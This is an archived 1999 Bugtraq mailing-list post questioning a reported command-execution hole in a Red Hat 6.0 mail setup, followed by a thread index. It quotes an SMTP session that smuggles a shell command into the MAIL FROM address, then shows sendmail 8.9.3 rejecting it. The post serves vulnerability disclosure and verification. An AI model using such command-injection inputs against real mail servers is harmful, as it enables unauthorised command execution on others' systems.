Bugtraq mailing list archives
RH6.0 local/remote command execution
From: nhaniff () WWW RCC RYERSON CA (Neezam Haniff)
Date: Wed, 6 Oct 1999 13:49:59 -0400
Hi, Here are some comments below...
The remote exploit is merely: bash-2.03$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT) MAIL FROM: ;/command/to/execute; 250 <;/command/to/execute;> ... Sender Okay RCPT TO: rpmmail 250 <rpmmail> ... Recipient Okay data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit
I find this odd that this exploit could exist on a Red Hat 6.0 installation. sendmail 8.9.3 is the mailer that is installed and the way it's been configured, there's no way it would accept that sender address since it's not qualifiable. Please confirm this. This is what I get when I test this scenario on a Red Hat 6.0 system: [[nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400 helo x.x 250 dhcp-160-190.x.x Hello IDENT:250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you MAIL FROM: ;/command/to/execute; 553 ;/command/to/execute;... Domain name required The only way someone could take advantage of this exploit is if their mailer configuration allows for the sender to non-qualifiable. Neezam.
Current thread:
- Re: RFP9903: AeDebug vulnerability David LeBlanc (Oct 03)
- Re: RFP9903: AeDebug vulnerability .rain.forest.puppy. (Oct 03)
- Re: RFP9903: AeDebug vulnerability Pete Deuel (Oct 05)
- NetScreen Brain-deadness... Ash (Oct 05)
- RH6.0 local/remote command execution Neezam Haniff (Oct 06)
- Re: RH6.0 local/remote command execution D (Oct 08)
- tcpdump under RedHat 6.1 Renaud Deraison (Oct 09)
- Re: NetScreen Brain-deadness... Dave McPike (Oct 06)
- RH6.0 local/remote command execution Neezam Haniff (Oct 06)
- Re: RFP9903: AeDebug vulnerability Stefan Norberg (Oct 06)
- <Possible follow-ups>
- Re: RFP9903: AeDebug vulnerability Todd Sabin (Oct 05)
- Re: RFP9903: AeDebug vulnerability David LeBlanc (Oct 05)
- Re: RFP9903: AeDebug vulnerability Joe Melhado (Oct 06)
- Re: RFP9903: AeDebug vulnerability Enno Rey (Oct 07)